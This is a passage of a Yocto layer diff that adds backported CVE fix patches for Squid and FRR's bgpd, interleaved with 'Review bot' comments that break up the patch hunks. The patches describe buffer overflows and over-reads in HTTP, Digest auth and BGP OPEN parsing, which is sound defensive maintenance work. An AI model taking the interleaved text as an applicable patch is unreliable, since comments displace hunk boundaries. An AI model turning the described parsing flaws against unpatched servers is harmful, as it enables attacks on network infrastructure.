chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) + void +-Http::One::TeChunkedParser::parseOneChunkExtension(Tokenizer &tok) ++Http::One::TeChunkedParser::parseOneChunkExtension(Tokenizer &callerTok) + { ++ auto tok = callerTok; ++ + ParseBws(tok); // Bug 4492: ICAP servers send SP before chunk-ext-name + + const auto extName = tok.prefix("chunk-ext-name", CharacterSet::TCHAR); ++ callerTok = tok; // in case we determine that this is a valueless chunk-ext + + ParseBws(tok); + +@@ -176,6 +187,8 @@ Http::One::TeChunkedParser::parseOneChun + customExtensionValueParser->parse(tok, extName); + else + ChunkExtensionValueParser::Ignore(tok, extName); ++ ++ callerTok = tok; + } + + bool +@@ -209,7 +222,7 @@ Http::One::TeChunkedParser::parseChunkEn + Must(theLeftBodySize == 0); // Should(), really + + try { +- skipLineTerminator(tok); ++ tok.skipRequired("chunk CRLF", Http1::CrLf()); + buf_ = tok.remaining(); // parse checkpoint + theChunkSize = 0; // done with the current chunk + parsingStage_ = Http1::HTTP_PARSE_CHUNK_SZ; +--- a/src/parser/Tokenizer.cc ++++ b/src/parser/Tokenizer.cc +@@ -147,6 +147,18 @@ Parser::Tokenizer::skipAll(const Charact + return success(prefixLen); + } + ++void ++Parser::Tokenizer::skipRequired(const char *description, const SBuf &tokenToSkip) ++{ ++ if (skip(tokenToSkip) || tokenToSkip.isEmpty()) ++ return; ++ ++ if (tokenToSkip.startsWith(buf_)) ++ throw InsufficientInput(); ++ ++ throw TextException(ToSBuf("cannot skip ", description), Here()); ++} ++ + bool + Parser::Tokenizer::skipOne(const CharacterSet &chars) + { +--- a/src/parser/Tokenizer.h ++++ b/src/parser/Tokenizer.h +@@ -115,6 +115,13 @@ public: + */ + SBuf::size_type skipAll(const CharacterSet &discardables); + ++ /** skips a given character sequence (string); ++ * does nothing if the sequence is empty ++ * ++ * \throws exception on mismatching prefix or InsufficientInput ++ */ ++ void skipRequired(const char *description, const SBuf &tokenToSkip); ++ + /** Removes a single trailing 
character from the set. + * + * \return whether a character was removed diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46847.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46847.patch new file mode 100644 index 0000000000..9071872c01 --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46847.patch 
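Review bot: The two chunk-framing call sites in TeChunkedParser.cc (after the chunk-ext list and in parseChunkEnd) now call `tok.skipRequired(..., Http1::CrLf())` directly, but nothing in the new code says why they bypass `skipLineTerminator()`, which still accepts a bare LF when `Config.onoff.relaxed_header_parser` is set. A later cleanup could plausibly route them back through the helper and restore bare-LF tolerance in chunk framing, which looks like what this change is meant to remove. I would add a comment at each site, e.g. `// strict CRLF only: chunk framing must not inherit relaxed_header_parser's bare-LF tolerance`. Separately, the rewritten doc line `/// Parses the chunk-ext list (RFC 9112 section 7.1.1:` has lost its closing parenthesis.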
@@ -0,0 +1,47 @@
+From 052cf082b0faaef4eaaa4e94119d7a1437aac4a3 Mon Sep 17 00:00:00 2001
+From: squidadm <squidadm@users.noreply.github.com>
+Date: Wed, 18 Oct 2023 04:50:56 +1300
+Subject: [PATCH] Fix stack buffer overflow when parsing Digest Authorization
+ (#1517)
+
+The bug was discovered and detailed by Joshua Rogers at
+https://megamansec.github.io/Squid-Security-Audit/digest-overflow.html
+where it was filed as "Stack Buffer Overflow in Digest Authentication".
+
+---------
+
+Co-authored-by: Alex Bason <nonsleepr@gmail.com>
+Co-authored-by: Amos Jeffries <yadij@users.noreply.github.com>
+
+Upstream-Status: Backport [https://github.com/squid-cache/squid/commit/052cf082b0faaef4eaaa4e94119d7a1437aac4a3]
+CVE: CVE-2023-46847
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/auth/digest/Config.cc | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/src/auth/digest/Config.cc b/src/auth/digest/Config.cc
+index 6a9736f..0a883fa 100644
+--- a/src/auth/digest/Config.cc
++++ b/src/auth/digest/Config.cc
+@@ -847,11 +847,15 @@ Auth::Digest::Config::decode(char const *proxy_auth, const char *aRequestRealm)
+ break;
+
+ case DIGEST_NC:
+- if (value.size() != 8) {
++ if (value.size() == 8) {
++ // for historical reasons, the nc value MUST be exactly 8 bytes
++ static_assert(sizeof(digest_request->nc) == 8 + 1, "bad nc buffer size");
++ xstrncpy(digest_request->nc, value.rawBuf(), value.size() + 1);
++ debugs(29, 9, "Found noncecount '" << digest_request->nc << "'");
++ } else {
+ debugs(29, 9, "Invalid nc '" << value << "' in '" << temp << "'");
++ digest_request->nc[0] = 0;
+ }
+- xstrncpy(digest_request->nc, value.rawBuf(), value.size() + 1);
+- debugs(29, 9, "Found noncecount '" << digest_request->nc << "'");
+ break;
+
+ case DIGEST_CNONCE:
+--
+2.40.1
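Review bot: In the DIGEST_NC case of Auth::Digest::Config::decode() the length 8 is written as a literal in the `if` and again inside the static_assert, so the bound that keeps the xstrncpy() inside `digest_request->nc` has to be kept in step by hand. Writing the test as `if (value.size() == sizeof(digest_request->nc) - 1) {` states the invariant once and ties the copy directly to its destination. The accepted branch checks length only; whether the eight bytes are later validated as hex digits, and whether an emptied nc causes the request to be rejected, depends on code outside the hunk, since decode() continues past it.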
diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-49285.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-49285.patch
new file mode 100644
index 0000000000..6909f754f3
--- /dev/null
+++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-49285.patch
@@ -0,0 +1,37 @@
+From 77b3fb4df0f126784d5fd4967c28ed40eb8d521b Mon Sep 17 00:00:00 2001
+From: Alex Rousskov <rousskov@measurement-factory.com>
+Date: Wed, 25 Oct 2023 19:41:45 +0000
+Subject: [PATCH] RFC 1123: Fix date parsing (#1538)
+
+The bug was discovered and detailed by Joshua Rogers at
+https://megamansec.github.io/Squid-Security-Audit/datetime-overflow.html
+where it was filed as "1-Byte Buffer OverRead in RFC 1123 date/time
+Handling".
+
+Upstream-Status: Backport [https://github.com/squid-cache/squid/commit/77b3fb4df0f126784d5fd4967c28ed40eb8d521b]
+CVE: CVE-2023-49285
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/rfc1123.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/lib/rfc1123.c b/lib/rfc1123.c
+index 2d889cc..add63f0 100644
+--- a/lib/rfc1123.c
++++ b/lib/rfc1123.c
+@@ -50,7 +50,13 @@ make_month(const char *s)
+ char month[3];
+
+ month[0] = xtoupper(*s);
++ if (!month[0])
++ return -1; // protects *(s + 1) below
++
+ month[1] = xtolower(*(s + 1));
++ if (!month[1])
++ return -1; // protects *(s + 2) below
++
+ month[2] = xtolower(*(s + 2));
+
+ for (i = 0; i < 12; i++)
+--
+2.39.3
diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-49286.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-49286.patch
new file mode 100644
index 0000000000..8e0bdf387c
--- /dev/null
+++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-49286.patch
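Review bot: make_month() in lib/rfc1123.c gains two early `return -1;` exits, but the hunk adds no statement of that contract, and the callers that have to handle -1 are outside the hunk. A header comment such as `/* returns the month index for the three-letter name at s, or -1 if s ends before three bytes or names no month */` would make the failure value explicit; the "names no month" part is inferred from the `for (i = 0; i < 12; i++)` loop whose body is not visible here. It is worth confirming that every caller treats a negative result as a parse failure before using it.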
@@ -0,0 +1,87 @@ +From 6014c6648a2a54a4ecb7f952ea1163e0798f9264 Mon Sep 17 00:00:00 2001 +From: Alex Rousskov <rousskov@measurement-factory.com> +Date: Fri, 27 Oct 2023 21:27:20 +0000 +Subject: [PATCH] Exit without asserting when helper process startup fails + (#1543) + +... to dup() after fork() and before execvp(). + +Assertions are for handling program logic errors. Helper initialization +code already handled system call errors correctly (i.e. by exiting the +newly created helper process with an error), except for a couple of +assert()s that could be triggered by dup(2) failures. + +This bug was discovered and detailed by Joshua Rogers at +https://megamansec.github.io/Squid-Security-Audit/ipc-assert.html +where it was filed as 'Assertion in Squid "Helper" Process Creator'. + +Origin: http://www.squid-cache.org/Versions/v6/SQUID-2023_8.patch + +Upstream-Status: Backport [https://github.com/squid-cache/squid/commit/6014c6648a2a54a4ecb7f952ea1163e0798f9264] +CVE: CVE-2023-49286 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/ipc.cc | 33 +++++++++++++++++++++++++++------ + 1 file changed, 27 insertions(+), 6 deletions(-) + +--- a/src/ipc.cc ++++ b/src/ipc.cc +@@ -20,6 +20,12 @@ + #include "SquidIpc.h" + #include "tools.h" + ++#include <cstdlib> ++ ++#if HAVE_UNISTD_H ++#include <unistd.h> ++#endif ++ + static const char *hello_string = "hi there\n"; + #ifndef HELLO_BUF_SZ + #define HELLO_BUF_SZ 32 +@@ -365,6 +371,22 @@ + } + + PutEnvironment(); ++ ++ // A dup(2) wrapper that reports and exits the process on errors. The ++ // exiting logic is only suitable for this child process context. 
++ const auto dupOrExit = [prog,name](const int oldFd) { ++ const auto newFd = dup(oldFd); ++ if (newFd < 0) { ++ const auto savedErrno = errno; ++ debugs(54, DBG_CRITICAL, "ERROR: Helper process initialization failure: " << name); ++ debugs(54, DBG_CRITICAL, "helper (CHILD) PID: " << getpid()); ++ debugs(54, DBG_CRITICAL, "helper program name: " << prog); ++ debugs(54, DBG_CRITICAL, "dup(2) system call error for FD " << oldFd << ": " << xstrerr(savedErrno)); ++ _exit(1); ++ } ++ return newFd; ++ }; ++ + /* + * This double-dup stuff avoids problems when one of + * crfd, cwfd, or debug_log are in the rage 0-2. +@@ -372,17 +394,16 @@ + + do { + /* First make sure 0-2 is occupied by something. Gets cleaned up later */ +- x = dup(crfd); +- assert(x > -1); +- } while (x < 3 && x > -1); ++ x = dupOrExit(crfd); ++ } while (x < 3); + + close(x); + +- t1 = dup(crfd); ++ t1 = dupOrExit(crfd); + +- t2 = dup(cwfd); ++ t2 = dupOrExit(cwfd); + +- t3 = dup(fileno(debug_log)); ++ t3 = dupOrExit(fileno(debug_log)); + + assert(t1 > 2 && t2 > 2 && t3 > 2); + diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-50269.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-50269.patch new file mode 100644 index 0000000000..51c895e0ef --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-50269.patch 
@@ -0,0 +1,62 @@ +From: Markus Koschany <apo@debian.org> +Date: Tue, 26 Dec 2023 19:58:12 +0100 +Subject: CVE-2023-50269 + +Bug-Debian: https://bugs.debian.org/1058721 +Origin: http://www.squid-cache.org/Versions/v5/SQUID-2023_10.patch + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-50269.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa +Upstream commit https://github.com/squid-cache/squid/commit/9f7136105bff920413042a8806cc5de3f6086d6d] +CVE: CVE-2023-50269 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/ClientRequestContext.h | 4 ++++ + src/client_side_request.cc | 17 +++++++++++++++-- + 2 files changed, 19 insertions(+), 2 deletions(-) + +--- a/src/ClientRequestContext.h ++++ b/src/ClientRequestContext.h +@@ -81,6 +81,10 @@ + #endif + ErrorState *error; ///< saved error page for centralized/delayed processing + bool readNextRequest; ///< whether Squid should read after error handling ++ ++#if FOLLOW_X_FORWARDED_FOR ++ size_t currentXffHopNumber = 0; ///< number of X-Forwarded-For header values processed so far ++#endif + }; + + #endif /* SQUID_CLIENTREQUESTCONTEXT_H */ +--- a/src/client_side_request.cc ++++ b/src/client_side_request.cc +@@ -78,6 +78,11 @@ + static const char *const crlf = "\r\n"; + + #if FOLLOW_X_FORWARDED_FOR ++ ++#if !defined(SQUID_X_FORWARDED_FOR_HOP_MAX) ++#define SQUID_X_FORWARDED_FOR_HOP_MAX 64 ++#endif ++ + static void clientFollowXForwardedForCheck(allow_t answer, void *data); + #endif /* FOLLOW_X_FORWARDED_FOR */ + +@@ -485,8 +490,16 @@ + /* override the default src_addr tested if we have to go deeper than one level into XFF */ + Filled(calloutContext->acl_checklist)->src_addr = request->indirect_client_addr; + } +- calloutContext->acl_checklist->nonBlockingCheck(clientFollowXForwardedForCheck, data); +- return; ++ if (++calloutContext->currentXffHopNumber < SQUID_X_FORWARDED_FOR_HOP_MAX) { ++ 
calloutContext->acl_checklist->nonBlockingCheck(clientFollowXForwardedForCheck, data); ++ return; ++ } ++ const auto headerName = Http::HeaderLookupTable.lookup(Http::HdrType::X_FORWARDED_FOR).name; ++ debugs(28, DBG_CRITICAL, "ERROR: Ignoring trailing " << headerName << " addresses"); ++ debugs(28, DBG_CRITICAL, "addresses allowed by follow_x_forwarded_for: " << calloutContext->currentXffHopNumber); ++ debugs(28, DBG_CRITICAL, "last/accepted address: " << request->indirect_client_addr); ++ debugs(28, DBG_CRITICAL, "ignored trailing addresses: " << request->x_forwarded_for_iterator); ++ // fall through to resume clientAccessCheck() processing + } + } + diff --git a/meta-networking/recipes-daemons/squid/squid_4.15.bb b/meta-networking/recipes-daemons/squid/squid_4.15.bb index a1122a3cd4..69b62aa5a5 100644 --- a/meta-networking/recipes-daemons/squid/squid_4.15.bb +++ b/meta-networking/recipes-daemons/squid/squid_4.15.bb @@ -25,6 +25,13 @@ SRC_URI = "http://www.squid-cache.org/Versions/v${MAJ_VER}/${BPN}-${PV}.tar.bz2 file://0001-tools.cc-fixed-unused-result-warning.patch \ file://0001-splay.cc-fix-bind-is-not-a-member-of-std.patch \ file://0001-Fix-build-on-Fedora-Rawhide-772.patch \ + file://CVE-2023-46847.patch \ + file://CVE-2023-49285.patch \ + file://CVE-2023-46728.patch \ + file://CVE-2023-46846-pre1.patch \ + file://CVE-2023-46846.patch \ + file://CVE-2023-49286.patch \ + file://CVE-2023-50269.patch \ " SRC_URI:remove:toolchain-clang = "file://0001-configure-Check-for-Wno-error-format-truncation-comp.patch" diff --git a/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb b/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb index e078be79a1..080a0ed85c 100644 --- a/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb +++ b/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb 
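Review bot: `SQUID_X_FORWARDED_FOR_HOP_MAX` is introduced in src/client_side_request.cc with the value 64 and no comment, and what happens at the limit can only be learned from the debugs() text. I would document it at the definition, e.g. `/// maximum number of X-Forwarded-For addresses followed per request; later addresses are ignored and processing resumes with the last accepted one`. Reaching the limit also writes four DBG_CRITICAL lines per request, one of which prints the client-supplied remainder of the header (`request->x_forwarded_for_iterator`), so repeated long headers can grow the log quickly; whether that is rate-limited elsewhere is not visible here. The enclosing function starts and ends outside the hunk.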
@@ -38,7 +38,7 @@ RDEPENDS:${PN}-ptest += " make bash python3-core python3-ctypes python3-json pyt TESTDIR = "tests" -PRIVATE_LIBS:${PN}-ptest:append = "libnftables.so.1" +PRIVATE_LIBS:${PN}-ptest:append = " libnftables.so.1" do_install_ptest() { cp -rf ${S}/build-aux ${D}${PTEST_PATH} diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-36440.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-36440.patch new file mode 100644 index 0000000000..c06de49eb3 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-36440.patch 
@@ -0,0 +1,71 @@ +From 02a0e45f66160f571196a105b217e1bb84d1a835 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Fri, 30 Sep 2022 08:51:45 -0400 +Subject: [PATCH] bgpd: Ensure FRR has enough data to read 2 bytes in + peek_for_as4_capability + +In peek_for_as4_capability the code is checking that the +stream has at least 2 bytes to read ( the opt_type and the +opt_length ). However if BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +is configured then FRR is reading 3 bytes. Which is not good +since the packet could be badly formated. Ensure that +FRR has the appropriate data length to read the data. + +Signed-off-by: Donald Sharp <sharpd@nvidia.com> +(cherry picked from commit 3e46b43e3788f0f87bae56a86b54d412b4710286) + +CVE: CVE-2022-36440 +CVE: CVE-2022-40302 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/02a0e45f66160f571196a105b217e1bb84d1a835] + +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_open.c | 27 +++++++++++++++++++++------ + 1 file changed, 21 insertions(+), 6 deletions(-) + +diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c +index c2562c75d3fc..fe4c24a8c979 100644 +--- a/bgpd/bgp_open.c ++++ b/bgpd/bgp_open.c +@@ -1116,15 +1116,30 @@ as_t peek_for_as4_capability(struct peer *peer, uint16_t length) + uint8_t opt_type; + uint16_t opt_length; + +- /* Check the length. */ +- if (stream_get_getp(s) + 2 > end) ++ /* Ensure we can read the option type */ ++ if (stream_get_getp(s) + 1 > end) + goto end; + +- /* Fetch option type and length. */ ++ /* Fetch the option type */ + opt_type = stream_getc(s); +- opt_length = BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +- ? stream_getw(s) +- : stream_getc(s); ++ ++ /* ++ * Check the length and fetch the opt_length ++ * If the peer is BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) ++ * then we do a getw which is 2 bytes. 
So we need to ++ * ensure that we can read that as well ++ */ ++ if (BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer)) { ++ if (stream_get_getp(s) + 2 > end) ++ goto end; ++ ++ opt_length = stream_getw(s); ++ } else { ++ if (stream_get_getp(s) + 1 > end) ++ goto end; ++ ++ opt_length = stream_getc(s); ++ } + + /* Option length check. */ + if (stream_get_getp(s) + opt_length > end) +-- +2.40.1 + diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-40318.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-40318.patch new file mode 100644 index 0000000000..9d6dcfb920 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-40318.patch 
@@ -0,0 +1,81 @@ +From 72088b05d469a6b6a8b9a2b250885246ea0c2acb Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Fri, 30 Sep 2022 08:57:43 -0400 +Subject: [PATCH] bgpd: Ensure FRR has enough data to read 2 bytes in + bgp_open_option_parse + +In bgp_open_option_parse the code is checking that the +stream has at least 2 bytes to read ( the opt_type and +the opt_length). However if BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +is configured then FRR is reading 3 bytes. Which is not good +since the packet could be badly formateed. Ensure that +FRR has the appropriate data length to read the data. + +Signed-off-by: Donald Sharp <sharpd@nvidia.com> +(cherry picked from commit 1117baca3c592877a4d8a13ed6a1d9bd83977487) + +CVE: CVE-2022-40318 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/72088b05d469a6b6a8b9a2b250885246ea0c2acb] + +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_open.c | 35 ++++++++++++++++++++++++++++------- + 1 file changed, 28 insertions(+), 7 deletions(-) + +diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c +index fe4c24a8c979..de550d2ac607 100644 +--- a/bgpd/bgp_open.c ++++ b/bgpd/bgp_open.c +@@ -1209,19 +1209,40 @@ int bgp_open_option_parse(struct peer *peer, uint16_t length, + uint8_t opt_type; + uint16_t opt_length; + +- /* Must have at least an OPEN option header */ +- if (STREAM_READABLE(s) < 2) { ++ /* ++ * Check that we can read the opt_type and fetch it ++ */ ++ if (STREAM_READABLE(s) < 1) { + zlog_info("%s Option length error", peer->host); + bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, + BGP_NOTIFY_OPEN_MALFORMED_ATTR); + return -1; + } +- +- /* Fetch option type and length. */ + opt_type = stream_getc(s); +- opt_length = BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +- ? stream_getw(s) +- : stream_getc(s); ++ ++ /* ++ * Check the length of the stream to ensure that ++ * FRR can properly read the opt_length. 
Then read it ++ */ ++ if (BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer)) { ++ if (STREAM_READABLE(s) < 2) { ++ zlog_info("%s Option length error", peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return -1; ++ } ++ ++ opt_length = stream_getw(s); ++ } else { ++ if (STREAM_READABLE(s) < 1) { ++ zlog_info("%s Option length error", peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return -1; ++ } ++ ++ opt_length = stream_getc(s); ++ } + + /* Option length check. */ + if (STREAM_READABLE(s) < opt_length) { +-- +2.40.1 + diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-42917.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-42917.patch new file mode 100644 index 0000000000..73493bb120 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-42917.patch 
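Review bot: The same zlog_info / bgp_notify_send / `return -1` block now appears three times in bgp_open_option_parse with the identical text "Option length error", so a log line cannot show which of the three reads came up short. Computing the required size once, `size_t need = BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) ? 2 : 1;`, and testing `STREAM_READABLE(s) < need` before the length read would leave a single error path for the length field. The function body continues outside the hunk.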
@@ -0,0 +1,36 @@ +From 5216a05b32390a64efeb598051411e1776042624 Mon Sep 17 00:00:00 2001 +From: Marius Tomaschewski <mt@suse.com> +Date: Fri, 11 Nov 2022 12:26:04 +0100 +Subject: [PATCH] tools: remove backslash from declare check regex + +The backslash in `grep -q '^declare \-a'` is not needed and +causes `grep: warning: stray \ before -` warning in grep-3.8. + +Signed-off-by: Marius Tomaschewski <mt@suse.com> + +CVE: CVE-2022-42917 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/5216a05b32390a64efeb598051411e1776042624] + +Signed-off-by: Yi Zhao <yi.zhao@windriver.com> +--- + tools/frrcommon.sh.in | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in +index 61f1abb37..3c16c27c6 100755 +--- a/tools/frrcommon.sh.in ++++ b/tools/frrcommon.sh.in +@@ -335,7 +335,7 @@ if [ -z "$FRR_PATHSPACE" ]; then + load_old_config "/etc/sysconfig/frr" + fi + +-if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare \-a'; then ++if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare -a'; then + log_warning_msg "watchfrr_options contains a bash array value." \ + "The configured value is intentionally ignored since it is likely wrong." \ + "Please remove or fix the setting." +-- +2.25.1 + diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-43681.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-43681.patch new file mode 100644 index 0000000000..77a011dbc9 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-43681.patch 
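Review bot: The patch header tags this change `CVE: CVE-2022-42917`, but the commit message only describes silencing a grep-3.8 "stray \ before -" warning and never says how the regex change relates to that CVE. Anyone auditing the layer's CVE status has to take the tag on trust; a sentence in the patch header, above the Upstream-Status line, explaining why this commit is treated as the fix would make the tag verifiable. Separately, `'^declare -a'` matches indexed arrays only, so an associative array (`declare -A`) in watchfrr_options would pass this check; whether that matters depends on code outside the hunk.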
@@ -0,0 +1,58 @@ +From f316975cedd8ef17d47b56be0d3d21711fe44a25 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Wed, 2 Nov 2022 13:24:48 -0400 +Subject: [PATCH] bgpd: Ensure that bgp open message stream has enough data to + read + +If a operator receives an invalid packet that is of insufficient size +then it is possible for BGP to assert during reading of the packet +instead of gracefully resetting the connection with the peer. + +Signed-off-by: Donald Sharp <sharpd@nvidia.com> +(cherry picked from commit 766eec1b7accffe2c04a5c9ebb14e9f487bb9f78) + +CVE: CVE-2022-43681 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/766eec1b7accffe2c04a5c9ebb14e9f487bb9f78] + +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_packet.c | 19 +++++++++++++++++++ + 1 file changed, 19 insertions(+) + +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index bcd47e32d453..5225db29fe09 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1176,8 +1176,27 @@ static int bgp_open_receive(struct peer *peer, bgp_size_t size) + || CHECK_FLAG(peer->flags, PEER_FLAG_EXTENDED_OPT_PARAMS)) { + uint8_t opttype; + ++ if (STREAM_READABLE(peer->curr) < 1) { ++ flog_err( ++ EC_BGP_PKT_OPEN, ++ "%s: stream does not have enough bytes for extended optional parameters", ++ peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return BGP_Stop; ++ } ++ + opttype = stream_getc(peer->curr); + if (opttype == BGP_OPEN_NON_EXT_OPT_TYPE_EXTENDED_LENGTH) { ++ if (STREAM_READABLE(peer->curr) < 2) { ++ flog_err( ++ EC_BGP_PKT_OPEN, ++ "%s: stream does not have enough bytes to read the extended optional parameters optlen", ++ peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return BGP_Stop; ++ } + optlen = stream_getw(peer->curr); + SET_FLAG(peer->sflags, + PEER_STATUS_EXT_OPT_PARAMS_LENGTH); +-- +2.40.1 + 
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-31489.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31489.patch new file mode 100644 index 0000000000..6fd6792087 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31489.patch 
@@ -0,0 +1,52 @@ +From 4e1fc50394df0b69f32a9cf8ba8e1dcee2c67563 Mon Sep 17 00:00:00 2001 +From: Narpat Mali <narpat.mali@windriver.com> +Date: Tue, 20 Jun 2023 14:01:46 +0000 +Subject: [PATCH] bgpd: Check 7 bytes for Long-lived Graceful-Restart + capability + +It's not 4 bytes, it was assuming the same as Graceful-Restart tuples. +LLGR has more 3 bytes (Long-lived Stale Time). + +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-31489 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b1d33ec293e8e36fbb8766252f3b016d268e31ce] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_open.c | 14 +++++++++++++- + 1 file changed, 13 insertions(+), 1 deletion(-) + +diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c +index 6bdefd0e9..ad56149f6 100644 +--- a/bgpd/bgp_open.c ++++ b/bgpd/bgp_open.c +@@ -578,12 +578,24 @@ static int bgp_capability_restart(struct peer *peer, + static int bgp_capability_llgr(struct peer *peer, + struct capability_header *caphdr) + { ++/* ++ * +--------------------------------------------------+ ++ * | Address Family Identifier (16 bits) | ++ * +--------------------------------------------------+ ++ * | Subsequent Address Family Identifier (8 bits) | ++ * +--------------------------------------------------+ ++ * | Flags for Address Family (8 bits) | ++ * +--------------------------------------------------+ ++ * | Long-lived Stale Time (24 bits) | ++ * +--------------------------------------------------+ ++ */ ++#define BGP_CAP_LLGR_MIN_PACKET_LEN 7 + struct stream *s = BGP_INPUT(peer); + size_t end = stream_get_getp(s) + caphdr->length; + + SET_FLAG(peer->cap, PEER_CAP_LLGR_RCV); + +- while (stream_get_getp(s) + 4 <= end) { ++ while (stream_get_getp(s) + BGP_CAP_LLGR_MIN_PACKET_LEN <= end) { + afi_t afi; + safi_t safi; + iana_afi_t pkt_afi = stream_getw(s); +-- +2.40.0 
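Review bot: `BGP_CAP_LLGR_MIN_PACKET_LEN` is #defined inside the body of bgp_capability_llgr and never undefined, so it stays visible for the rest of bgp_open.c; moving it to file or header scope, or adding `#undef BGP_CAP_LLGR_MIN_PACKET_LEN` after the loop, keeps its scope explicit. The loop guard now matches the 7-byte tuple in the diagram, but bytes left over when `caphdr->length` is not a multiple of 7 are handled by code after the loop, which is outside this hunk; confirm the read pointer is moved to `end` there. On provenance, the From: line names the backporter while the only author sign-off is Donatas Abraitis, so the commit linked in Upstream-Status is the reference to compare this patch against.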
diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-31490.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31490.patch new file mode 100644 index 0000000000..893c856c66 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31490.patch 
